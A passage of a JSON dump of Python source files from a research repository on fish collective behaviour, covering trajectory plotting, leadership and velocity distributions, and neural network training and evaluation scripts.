bw_adjust=0.6, cut=-1)\n ax = sns.kdeplot(follower_dist, ax=ax, color=ccolour,\n linestyle=':', label='Follower (' + k + ')', linewidth=uni_linewidth, gridsize=args.kde_gridsize, clip=clipping_range, bw_adjust=0.6, cut=-1)\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {}\n data[e]['pos'] = []\n data[e]['vel'] = []\n data[e]['rvel'] = []\n for p in pos:\n if e == 'Virtual (Toulouse)':\n f = open(p)\n # to allow for loading fortran's doubles\n strarray = f.read().replace(\"D+\", \"E+\").replace(\"D-\", \"E-\")\n f.close()\n num_ind = len(strarray.split('\\n')[0].strip().split(' '))\n positions = np.fromstring(\n strarray, sep='\\n').reshape(-1, num_ind) * args.radius\n elif e == 'Virtual (Toulouse cpp)':\n positions = np.loadtxt(p)[:, 2:] * args.radius\n else:\n positions = np.loadtxt(p) * args.radius\n velocities = Velocities([positions], args.timestep).get()[0]\n linear_velocity = np.array((velocities.shape[0], 1))\n tup = []\n for i in range(velocities.shape[1] // 2):\n linear_velocity = np.sqrt(\n velocities[:, i * 2] ** 2 + velocities[:, i * 2 + 1] ** 2).tolist()\n tup.append(linear_velocity)\n data[e]['rvel'].append(np.array(tup).T)\n data[e]['pos'].append(positions)\n data[e]['vel'].append(velocities)\n\n _ = plt.figure(figsize=(5, 5))\n ax = plt.gca()\n\n ax = compute_resultant_velocity(data, ax, args, [0, 41])\n\n ax.set_xlabel('$V$ (cm/s)')\n ax.set_ylabel('PDF')\n # ax.set_xlim([-0.02, 0.6])\n ax.legend()\n 
plt.savefig(path + 'linear_velocity.png')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Resultant velocity histogram figure')\n parser.add_argument('--path', '-p', type=str,\n help='Path to data directory',\n required=True)\n parser.add_argument('--timestep', '-t', type=float,\n help='Timestep',\n required=True)\n parser.add_argument('--radius', '-r', type=float,\n help='Raidus',\n default=0.25,\n required=False)\n parser.add_argument('--kde_gridsize',\n type=int,\n help='Grid size for kernel density estimation plots',\n default=1500,\n required=False)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n parser.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n parser.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.7412587404251099,
"alphanum_fraction": 0.7552447319030762,
"avg_line_length": 34.75,
"blob_id": "7fb0fa5a58ee2c610d90538fa3bc5103f7905751",
"content_id": "a06af64789e9e933b46c3b2e599b15d2f3c18c64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 4,
"path": "/find/simulation/simu/setup.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom setuptools import setup, find_packages\n\nsetup(name='python_particle_simu', version='0.1', packages=find_packages())\n"
},
{
"alpha_fraction": 0.5725958347320557,
"alphanum_fraction": 0.6040226221084595,
"avg_line_length": 32.14583206176758,
"blob_id": "144a84d8ea49aa559c828c422acfd03924871b40",
"content_id": "ed8442ae9022f69ef6f482033f504aa09e84e18b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1591,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 48,
"path": "/find/plots/physiological/plot_kicks.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport os\nimport sys\nimport glob\nimport argparse\nimport numpy as np\nfrom pathlib import Path\n\nimport scipy.signal as signal\nimport matplotlib.pyplot as plt\n\nfrom find.utils.features import Velocities\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Preprocess fish trajectories')\n parser.add_argument('--path', '-p', type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--output', '-o', type=str,\n help='Filename for the output file',\n required=True)\n args = parser.parse_args()\n\n positions = np.loadtxt(args.path) * 0.25\n velocities = Velocities([positions], 1.0/25).get()[0][1000:1150]\n\n fig = plt.figure(figsize=(6, 2))\n ax = plt.gca()\n\n rvelocities = []\n for i in range(velocities.shape[0]):\n r = np.sqrt(velocities[i, 1] ** 2 +\n velocities[i, 0] ** 2 -\n 2 * np.abs(velocities[i, 1]) * np.abs(velocities[i, 0]) * np.cos(np.arctan2(velocities[i, 1], velocities[i, 0])))\n rvelocities.append(r)\n rvelocities = np.array(rvelocities)\n\n peaks = signal.find_peaks_cwt(rvelocities, np.arange(0.1, 0.3))\n valleys = signal.find_peaks_cwt(1 / rvelocities, np.arange(0.1, 0.3))\n\n print('Num peaks: ', len(peaks))\n\n ax.set_xticks(np.arange(0, len(rvelocities) + 1, 25))\n\n plt.plot(rvelocities, linewidth=0.07)\n # plt.plot(valleys, rvelocities[valleys], 'o', markersize=0.4)\n plt.savefig(args.output + '.png', dpi=300)\n"
},
{
"alpha_fraction": 0.5359463095664978,
"alphanum_fraction": 0.5686444640159607,
"avg_line_length": 30.630136489868164,
"blob_id": "c241b4869718c4c79e0129d53f531dc73d0333f5",
"content_id": "ce54e13280db1f48ed97db0d5eff8ab71fc6367a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4618,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 146,
"path": "/examples/gaussian_nll_example.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nfrom find.models.tf_losses import *\nimport argparse\nimport sys\n\nimport matplotlib.lines as mlines\nimport seaborn as sns\nimport tensorflow as tf\nfrom pylab import *\n\nsys.path.append('.')\n\nflatui = [\"#9b59b6\", \"#3498db\", \"#95a5a6\", \"#e74c3c\", \"#34495e\", \"#2ecc71\"]\npalette = flatui\n# palette = 'Paired'\n# palette = \"husl\"\ncolors = sns.color_palette(palette)\nsns.set(style=\"darkgrid\")\n\ngfontsize = 10\nparams = {\n 'axes.labelsize': gfontsize,\n 'font.size': gfontsize,\n 'legend.fontsize': gfontsize,\n 'xtick.labelsize': gfontsize,\n 'ytick.labelsize': gfontsize,\n 'text.usetex': False,\n # 'figure.figsize': [10, 15]\n # 'ytick.major.pad': 4,\n # 'xtick.major.pad': 4,\n 'font.family': 'Arial',\n}\nrcParams.update(params)\n\npts = np.linspace(0, np.pi * 2, 24)\ncirc = np.c_[np.sin(pts) / 2, -np.cos(pts) / 2]\nvert = np.r_[circ, circ[::-1] * 1.0]\nopen_circle = mpl.path.Path(vert)\n\nextra = Rectangle((0, 0), 1, 1, fc=\"w\", fill=False,\n edgecolor='none', linewidth=0)\nshapeList = [\n Circle((0, 0), radius=1, facecolor=colors[0]),\n Circle((0, 0), radius=1, facecolor=colors[1]),\n Circle((0, 0), radius=1, facecolor=colors[2]),\n # Circle((0, 0), radius=1, facecolor=colors[3]),\n # Circle((0, 0), radius=1, facecolor=colors[4]),\n # Circle((0, 0), radius=1, facecolor=colors[5]),\n]\n\nv = np.r_[circ, circ[::-1] * 0.6]\noc = mpl.path.Path(v)\n\nhandles_a = [\n mlines.Line2D([0], [0], color='black', marker=oc,\n markersize=6, label='Mean and SD'),\n mlines.Line2D([], [], linestyle='none', color='black', marker='*',\n markersize=5, label='Median'),\n mlines.Line2D([], [], linestyle='none', markeredgewidth=1, marker='o',\n color='black', markeredgecolor='w', markerfacecolor='black', alpha=0.5,\n markersize=5, label='Single run')\n]\nhandles_b = [\n mlines.Line2D([0], [1], color='black', label='Mean'),\n Circle((0, 0), radius=1, facecolor='black', alpha=0.35, label='SD')\n]\n\n\ndef pplots(data, ax, sub_colors=[], exp_title='', ticks=False):\n paper_rc = {'lines.linewidth': 1, 'lines.markersize': 10}\n sns.set_context(\"paper\", rc=paper_rc)\n\n sns.pointplot(data=np.transpose(data), palette=sub_colors,\n size=5, estimator=np.mean,\n ci='sd', capsize=0.2, linewidth=0.8, markers=[open_circle],\n scale=1.6, ax=ax)\n\n sns.stripplot(data=np.transpose(data), edgecolor='white',\n dodge=True, jitter=True,\n alpha=.50, linewidth=0.8, size=5, palette=sub_colors, ax=ax)\n\n medians = []\n for d in data:\n medians.append([np.median(list(d))])\n sns.swarmplot(data=medians, palette=['#000000'] * 10,\n marker='*', size=5, ax=ax)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Dense model to reproduce fish motion')\n parser.add_argument('--epochs', '-e', type=int,\n help='Number of training epochs',\n default=10000)\n parser.add_argument('--batch_size', '-b', type=int,\n help='Batch size',\n default=256)\n args = parser.parse_args()\n\n X = np.random.rand(200, 1) * 5\n Y = np.cos(X)\n\n split_at = X.shape[0] - X.shape[0] // 10\n (x_train, x_val) = X[:split_at, :], X[split_at:, :]\n (y_train, y_val) = Y[:split_at, :], Y[split_at:, :]\n\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.Flatten(input_shape=(x_train.shape[1],)))\n model.add(tf.keras.layers.Dense(20, activation='tanh'))\n model.add(tf.keras.layers.Dense(Y.shape[1] * 2, activation=None))\n\n loss = gaussian_nll\n optimizer = tf.keras.optimizers.Adam(0.0001)\n model.compile(loss=loss,\n optimizer=optimizer,\n metrics=[gaussian_mse, gaussian_mae]\n 
)\n model.summary()\n\n for epoch in range(args.epochs):\n model.fit(x_train, y_train,\n batch_size=args.batch_size,\n epochs=epoch + 1,\n initial_epoch=epoch,\n validation_data=(x_val, y_val),\n verbose=1)\n\n model.save('cos_model.h5')\n\n sigmas = []\n for i in range(X.shape[0]):\n p = model.predict(X[i])\n sigmas.append(np.exp(p[0, 1]))\n\n np.savetxt('cos_sigmas.dat', np.array(sigmas))\n\n plt.figure()\n plt.plot(sigmas)\n plt.legend(labels=['sigma'])\n plt.show()\n\n plt.figure()\n plt.plot(Y[:, 0])\n plt.plot(np.array(model.predict(X))[:, 0])\n plt.legend(labels=['real', 'predicted'])\n plt.show()\n"
},
{
"alpha_fraction": 0.40397706627845764,
"alphanum_fraction": 0.44070225954055786,
"avg_line_length": 33.88750076293945,
"blob_id": "fc800f15af6a22dd9c2466f16e065684056d099b",
"content_id": "cbfa14c241986093fe742af1e09c1b192f9b2222",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5582,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 160,
"path": "/find/plots/dl_si_2021/nn_plots.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\n\nfrom find.plots.common import *\nimport find.plots.common as shared\n\nimport find.plots.nn.training_history as th\nimport find.plots.nn.parameters_to_epoch as pte\n\n\ndef plot(exp_files, path, args):\n history_files = []\n for d in args.nn_compare_dirs:\n history_files.append(glob.glob(d + '/logs/history.csv'))\n\n _, ax = plt.subplots(figsize=(10, 10),\n nrows=6, ncols=len(history_files),\n gridspec_kw={'width_ratios': [\n 1] * len(history_files), 'wspace': 1.4, 'hspace': 1.2}\n )\n\n config = {\n 'gaussian_mae': {\n 'title': 'Mean Absolute error\\n (training)',\n 'limy': (0.02, 0.14, 0.03),\n 'limx': (0, 15000, 3000),\n\n },\n 'gaussian_mse': {\n 'title': 'Mean Squared error\\n (training)',\n 'limy': (0.0025, 0.035, 0.01),\n 'limx': (0, 15000, 3000),\n\n },\n 'loss': {\n 'title': 'Loss\\n (training)',\n 'limy': (-6.5, 4, 2),\n 'limx': (0, 15000, 3000),\n\n },\n 'val_gaussian_mae': {\n 'title': 'Mean Absolute error\\n (validation)',\n 'limy': (0.02, 0.14, 0.03),\n 'limx': (0, 15000, 3000),\n\n },\n 'val_gaussian_mse': {\n 'title': 'Mean Squared error\\n (validation)',\n 'limy': (0.0025, 0.035, 0.01),\n 'limx': (0, 15000, 3000),\n\n },\n 'val_loss': {\n 'title': 'Loss\\n (validation)',\n 'limy': (-3.5, 6, 2),\n 'limx': (0, 15000, 3000),\n\n },\n 'cax_lstm': 1.1,\n 'cax_pfw': 1.1,\n }\n\n for hf_idx, hf in enumerate(history_files):\n plot_dict = th.prepare_plot_history(hf, path, args)\n\n for it, (k, v) in enumerate(sorted(plot_dict.items())):\n if len(hf) > 1:\n cax = ax[it, hf_idx]\n else:\n cax = ax[it]\n palette = sns.color_palette(\n 'Spectral', n_colors=len(v))\n ccycler = cycle(palette)\n lines = ['-', '--', ':']\n linecycler = cycle(lines)\n\n for label, x, y in v:\n sns.lineplot(x=x, y=y, ax=cax, label=label,\n linewidth=uni_linewidth, color=next(ccycler), linestyle=next(linecycler))\n cax.legend().remove()\n cax.set_xlabel('Epochs')\n cax.set_ylabel(config[k]['title'])\n\n cax.set_yticks(np.arange(\n config[k]['limy'][0], config[k]['limy'][1] + 0.0001, config[k]['limy'][2]))\n cax.set_ylim(config[k]['limy'][0], config[k]['limy'][1] + 0.0001)\n cax.set_xticks(np.arange(\n config[k]['limx'][0], config[k]['limx'][1] + 0.0001, config[k]['limx'][2]))\n cax.set_xlim(config[k]['limx'][0], config[k]['limx'][1] + 0.0001)\n cax.tick_params(axis='x', rotation=45)\n\n if it == 0:\n if 'pfw' in hf:\n offset = config['cax_pfw']\n print('ok')\n else:\n offset = config['cax_lstm']\n cax.legend(bbox_to_anchor=(\n offset, 1.0), bbox_transform=cax.transAxes, prop={'size': 4})\n\n plt.savefig(path + '/nn_th_eval.png', bbox_inches=\"tight\")\n\n # _, ax = plt.subplots(figsize=(11, 8),\n # nrows=2, ncols=len(history_files),\n # gridspec_kw={'width_ratios': [\n # 1] * len(history_files), 'wspace': 1.0, 'hspace': 0.25}\n # )\n\n # for hf_idx, hf in enumerate(history_files):\n # plot_dict = pte.plot_params_to_epoch(hf, path, args)\n\n # row_select = 0\n # for it, (k, v) in enumerate(sorted(plot_dict.items())):\n # if 'loss' not in k:\n # continue\n\n # if len(hf) > 1:\n # cax = ax[row_select, hf_idx]\n # else:\n # cax = ax[it]\n # palette = sns.color_palette(\n # 'Spectral', n_colors=len(hf))\n # ccycler = cycle(palette)\n\n # if k == 'num_params':\n # continue\n\n # xs = []\n # ys = []\n # zs = []\n # labels = []\n # for idx, (label, x, y) in enumerate(v):\n # xs.append(plot_dict['num_params'][idx])\n # ys.append(y[-1])\n # zs.append(x[-1])\n # labels.append(label)\n # zs = np.array(zs) / np.max(zs) * 6\n\n # for idx in range(len(xs)):\n # 
cax.plot(xs[idx], ys[idx], 'o', markersize=zs[idx],\n # label=labels[idx], color=next(ccycler))\n\n # cax.set_xlabel('Number of parameters')\n # cax.set_ylabel(k)\n # cax.ticklabel_format(axis='x', style='sci', scilimits=(0, 0))\n # cax.set_yticks(np.arange(\n # config['loss']['limy'][0], config['loss']['limy'][1] + 0.0001, config['loss']['limy'][2]))\n # cax.set_ylim(config['loss']['limy'][0],\n # config['loss']['limy'][1] + 0.0001)\n\n # if row_select == 0:\n # cax.legend(\n # prop={'size': 4}, fontsize='x-small',\n # bbox_to_anchor=(1.65, 1.0), borderaxespad=0,\n # labelspacing=2.5,\n # ncol=1)\n # row_select += 1\n\n # plt.savefig(path + '/nn_pte_eval.png', bbox_inches=\"tight\")\n"
},
{
"alpha_fraction": 0.7861635088920593,
"alphanum_fraction": 0.7861635088920593,
"avg_line_length": 29.285715103149414,
"blob_id": "fed96dae7a9be8cfc51a850475c7ed25d2c069ee",
"content_id": "fde90832c33822feee0d2bea2b422ea67bde6778",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 636,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 21,
"path": "/find/plots/correlation/__init__.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.plots.correlation import position_correlation\nfrom find.plots.correlation import velocity_correlation\nfrom find.plots.correlation import relative_orientation_correlation\nfrom find.plots.correlation import leadership_distribution\n\nplot_dict = {\n 'position_correlation': position_correlation.plot,\n 'velocity_correlation': velocity_correlation.plot,\n 'relative_orientation_correlation': relative_orientation_correlation.plot,\n 'leadership_distribution': leadership_distribution.plot,\n}\n\nsource = 'correlation'\n\n\ndef available_plots():\n return list(plot_dict.keys())\n\n\ndef get_plot(key):\n return plot_dict[key]\n"
},
{
"alpha_fraction": 0.47920677065849304,
"alphanum_fraction": 0.4890258014202118,
"avg_line_length": 34.57534408569336,
"blob_id": "9e108f980ae6a8dc4000a1a7e9f90e16e45132b1",
"content_id": "14d7624cc85df26d08f4c502d86fed38518b3ba5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5194,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 146,
"path": "/find/plots/correlation/leadership_distribution.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\nfrom itertools import groupby\nfrom operator import itemgetter\n\nfrom find.utils.utils import angle_to_pipi, compute_leadership\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\n\n\ndef plot_distribution(data, ax, args):\n # lines = ['-', '--', ':']\n linecycler = cycle(uni_lines)\n new_palette = uni_palette()\n # for p in uni_palette():\n # new_palette.extend([p, p, p])\n ccycler = cycle(sns.color_palette(new_palette))\n\n sample_count = {}\n leadership = {}\n for k in sorted(data.keys()):\n sample_count[k] = 0\n pos = data[k]['pos']\n vel = data[k]['vel']\n leadership[k] = []\n for idx in range(len(pos)):\n sample_count[k] += pos[idx].shape[0]\n (_, leadership_timeseries) = compute_leadership(pos[idx], vel[idx])\n leadership[k].append(leadership_timeseries)\n\n for kidx, k in enumerate(sorted(data.keys())):\n leaders = leadership[k]\n\n occurences = {}\n for e in range(len(data[k]['pos'])):\n lts = np.array(leaders[e])[:, 1].tolist()\n\n cons_count = 1\n for i in range(len(lts) - 1):\n if lts[i] != lts[i+1]:\n if cons_count not in occurences.keys():\n occurences[cons_count] = 1.\n else:\n occurences[cons_count] += 1.\n cons_count = 1\n else:\n cons_count += 1\n\n dist = np.array([list(occurences.keys()), list(occurences.values())]).T\n\n print(np.mean(dist[:, 0]) * args.timestep, k)\n col = next(ccycler)\n ax = sns.kdeplot(dist[:, 1], ax=ax, color=col,\n linestyle=next(linecycler), label=k, linewidth=uni_linewidth, gridsize=args.kde_gridsize,\n clip=[0, 500],\n bw_adjust=.2\n )\n\n # ticks = np.arange(0, 501, 50)\n # ax.set_xticks(ticks)\n # time = ticks * args.timestep\n # ax.set_xticklabels(time)\n # ax.axvline(np.mean(dist[:, 0]), color=col, linestyle='dashed')\n # ax.text(np.mean(dist[:, 0]) * 1.1, 0.018 - kidx * 0.003,\n # 'Mean: {:.2f}'.format(np.mean(dist[:, 0]) * args.timestep), color=col)\n # ax.set_xlim([-0.1, 500])\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {'pos': [], 'vel': []}\n for p in pos:\n if e == 'Virtual (Toulouse)':\n f = open(p)\n # to allow for loading fortran's doubles\n strarray = f.read().replace(\"D+\", \"E+\").replace(\"D-\", \"E-\")\n f.close()\n num_ind = len(strarray.split('\\n')[0].strip().split(' '))\n p = np.fromstring(\n strarray, sep='\\n').reshape(-1, num_ind) * args.radius\n f.close()\n else:\n p = np.loadtxt(p) * args.radius\n v = Velocities([p], args.timestep).get()[0]\n data[e]['pos'].append(p)\n data[e]['vel'].append(v)\n\n # relative angle to neigh\n _ = plt.figure(figsize=(6, 5))\n ax = plt.gca()\n\n ax = plot_distribution(data, ax, args)\n\n ax.set_xlabel(r'$t$ (s)')\n ax.set_ylabel('PDF')\n ax.legend()\n plt.savefig(path + 'leadership_distribution.png')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Relative orientation figure')\n parser.add_argument('--path', '-p', type=str,\n help='Path to data directory',\n required=True)\n parser.add_argument('--radius', '-r', type=float,\n help='Radius',\n default=0.25,\n required=False)\n parser.add_argument('--timestep', '-t', type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n parser.add_argument('--original_files',\n type=str,\n default='raw/*processed_positions.dat',\n required=False)\n 
parser.add_argument('--hybrid_files',\n type=str,\n default='generated/*generated_positions.dat',\n required=False)\n parser.add_argument('--virtual_files',\n type=str,\n default='generated/*generated_virtu_positions.dat',\n required=False)\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.5171722769737244,
"alphanum_fraction": 0.5208929777145386,
"avg_line_length": 43.79487228393555,
"blob_id": "fb85a352350e3afa1b4d919f7a3455f1df44664f",
"content_id": "014c05c1b5fed6eac3be69859418f8f483c887c1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3494,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 78,
"path": "/find/models/convert.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport argparse\n\nfrom find.models.loader import Loader\nfrom find.models.storage import ModelStorage\nfrom find.models.model_factory import ModelFactory, available_models\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Data converter')\n parser.add_argument('--files', '-f',\n type=str,\n help='Files to look for',\n default='processed_positions.dat',\n required=False)\n parser.add_argument('--path', '-p',\n type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--timestep', '-t',\n type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--timesteps_skip',\n type=int,\n help='Timesteps skipped between input and prediction',\n default=0,\n required=False)\n\n # model selection arguments\n model_selection = parser.add_argument_group('Model selection')\n model_selection.add_argument('--model',\n default=available_models()[0],\n choices=available_models())\n\n # model options\n model_options = parser.add_argument_group('Model options')\n model_options.add_argument('--polar', action='store_true',\n help='Use polar inputs instead of cartesian coordinates',\n default=False)\n model_options.add_argument('--prediction_steps', type=int,\n help='Trajectory steps to predict',\n default=1)\n model_options.add_argument('--num_timesteps', type=int,\n help='Number of LSTM timesteps',\n default=5)\n model_options.add_argument('--distance_inputs', action='store_true',\n help='Use distance data as additional NN inputs',\n default=False)\n\n # data split\n data_split_options = parser.add_argument_group('Data split options')\n data_split_options.add_argument('--train_fraction',\n type=float,\n help='Validation set fraction',\n default=0.85)\n data_split_options.add_argument('--val_fraction',\n type=float,\n help='Validation set fraction',\n default=0.13)\n data_split_options.add_argument('--test_fraction',\n type=float,\n help='Test set fraction',\n default=0.02)\n args = parser.parse_args()\n\n # data loading is handled here depending on the number of individuals\n # the loader will also handle the data splitting process according\n # to the arguments provided\n loader = Loader(path=args.path)\n pos, files = loader.load(args.files)\n inputs, outputs = loader.prepare(pos, args)\n td, tv, tt = loader.split_to_sets(inputs, outputs, args)\n\n # model storage instance to tidy up the directory and take care of saving/loading\n model_storage = ModelStorage(args.path)\n model_storage.save_sets(td, tv, tt)\n"
},
{
"alpha_fraction": 0.5153452754020691,
"alphanum_fraction": 0.5238704085350037,
"avg_line_length": 34.56060791015625,
"blob_id": "d5150b6b41f580163f48fc5f004f26c03d26e7cf",
"content_id": "d9383918b9a25a0bcb4819a12891635108842f0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2346,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 66,
"path": "/find/models/test.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport pickle\nimport argparse\nimport numpy as np\nfrom glob import glob\nimport functools\n\nfrom find.models.storage import ModelStorage\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Generate test results')\n parser.add_argument('--path', '-p', type=str,\n help='Path to the experiment',\n required=True)\n parser.add_argument('--backend',\n help='Backend selection',\n default='keras',\n choices=['keras', 'trajnet'])\n args = parser.parse_args()\n\n print('Using {} backend'.format(args.backend))\n if args.backend == 'keras':\n from tensorflow.keras.callbacks import CSVLogger\n models = glob('{}/model_checkpoint/model_*.h5'.format(args.path))\n model_storage = ModelStorage(args.path)\n\n def compare(item1, item2):\n if int(item1.split('_')[-1].split('.')[0]) < int(item2.split('_')[-1].split('.')[0]):\n return -1\n elif int(item1.split('_')[-1].split('.')[0]) > int(item2.split('_')[-1].split('.')[0]):\n return 1\n else: \n return 0\n\n models.sort(key=functools.cmp_to_key(compare))\n\n epochs = []\n measurements = []\n mnames = ''\n for model_path in models:\n model = model_storage.load_model(\n model_path, args.backend, args)\n\n f = open('{}/test/test_inputs.pkl'.format(args.path),'rb')\n X_test = pickle.load(f)\n f.close()\n \n f = open('{}/test/test_outputs.pkl'.format(args.path),'rb')\n Y_test = pickle.load(f)\n f.close()\n\n h = model.evaluate(x=X_test, y=Y_test,verbose=False)\n epochs.append(int(model_path.split('_')[-1].split('.')[0]))\n measurements.append(h)\n mnames = model.metrics_names\n measurements = np.array(measurements)\n\n f = open('{}/test/history.csv'.format(args.path), 'w')\n header = 'epochs,' + ','.join(str(x) for x in mnames)\n f.write('{}\\n'.format(header))\n for e, data in enumerate(measurements):\n row_str = ','.join(str(x) for x in data)\n f.write('{},{}\\n'.format(epochs[e], row_str))\n f.close()"
},
{
"alpha_fraction": 0.7123287916183472,
"alphanum_fraction": 0.7488584518432617,
"avg_line_length": 27.565217971801758,
"blob_id": "aaaf3e7de1cdddf3883e810e2644e9f6808c5bfa",
"content_id": "cb4d82c1e2898113951c0bc2c387b9b198bc88e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 657,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 23,
"path": "/find/plots/dl_si_2021/__init__.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.plots.dl_si_2021 import individual_quantities\nfrom find.plots.dl_si_2021 import collective_quantities\nfrom find.plots.dl_si_2021 import correlation_quantities\nfrom find.plots.dl_si_2021 import occupancy_grids\nfrom find.plots.dl_si_2021 import nn_plots\n\nplot_dict = {\n 'individual_quantities': individual_quantities.plot,\n 'collective_quantities': collective_quantities.plot,\n 'correlation_quantities': correlation_quantities.plot,\n 'occupancy_grids': occupancy_grids.plot,\n 'nn_plots': nn_plots.plot,\n}\n\nsource = 'dl-si-2021'\n\n\ndef available_plots():\n return list(plot_dict.keys())\n\n\ndef get_plot(key):\n return plot_dict[key]\n"
},
{
"alpha_fraction": 0.501852810382843,
"alphanum_fraction": 0.5203811526298523,
"avg_line_length": 29.224000930786133,
"blob_id": "d1175e661f7746e30b9d28116e21dc62f55f8117",
"content_id": "e87413a54f775f65e372d7f8201c2af1de8a1aae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3778,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 125,
"path": "/find/plots/spatial/grid_distribution_comparison.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport os\nimport glob\nimport argparse\nimport numpy as np\n\nfrom tqdm import tqdm, trange\nfrom find.plots.common import *\n\n\nfrom pathlib import Path\nimport matplotlib\nfrom scipy.interpolate import griddata\nimport scipy.stats as st\n\n\ndef occupancy_grid_dist(data, fig, type, ax, args, pad=0.05):\n grid = {}\n xy = np.empty((0, 2))\n for traj in data[type]:\n tsteps = traj.shape[0]\n individuals = traj.shape[1] // 2\n idcs = range(individuals)\n for i in range(tsteps):\n for j in idcs:\n traj_x = traj[i, j * 2]\n traj_y = traj[i, j * 2 + 1]\n xy = np.vstack((xy, np.array([traj_x, traj_y]).T))\n\n cmap = matplotlib.cm.get_cmap('jet')\n _ = plt.figure(figsize=(6, 6))\n ax = plt.gca()\n\n xx, yy = np.mgrid[-0.3:0.3:300j, -0.3:0.3:300j]\n kernel = st.gaussian_kde(xy.T)\n grid_pos = np.vstack([xx.ravel(), yy.ravel()])\n f = np.reshape(kernel(grid_pos).T, xx.shape)\n ax.contourf(xx, yy, f, cmap=cmap)\n outer = plt.Circle(\n (0, 0), 0.25, color='k', fill=False)\n ax.add_artist(outer)\n ax.set_xlim([-0.3, 0.3])\n ax.set_ylim([-0.3, 0.3])\n grid['xx'] = xx\n grid['yy'] = yy\n grid['f'] = f\n return ax, grid\n\n\ndef plot_grid_differences(files, path, args):\n keys = args.type\n if 'Real' not in keys and ('Hybrid' not in keys or 'Virtual' not in keys):\n import warnings\n warnings.warn('Skipping grid difference plots')\n return\n\n keys.remove('Real')\n skipped = 0\n\n desc = 'Occupancy grid distribution difference (Skipped {})'\n num_files = trange(\n len(files), desc=desc.format(skipped), leave=True)\n\n for i in num_files:\n f = files[i]\n r_xx = np.loadtxt(f.replace('f_Real', 'xx_Real'))\n r_yy = np.loadtxt(f.replace('f_Real', 'yy_Real'))\n r_f = np.loadtxt(f)\n\n for k in keys:\n if not os.path.isfile(f.replace('_Real', '_{}'.format(k))):\n 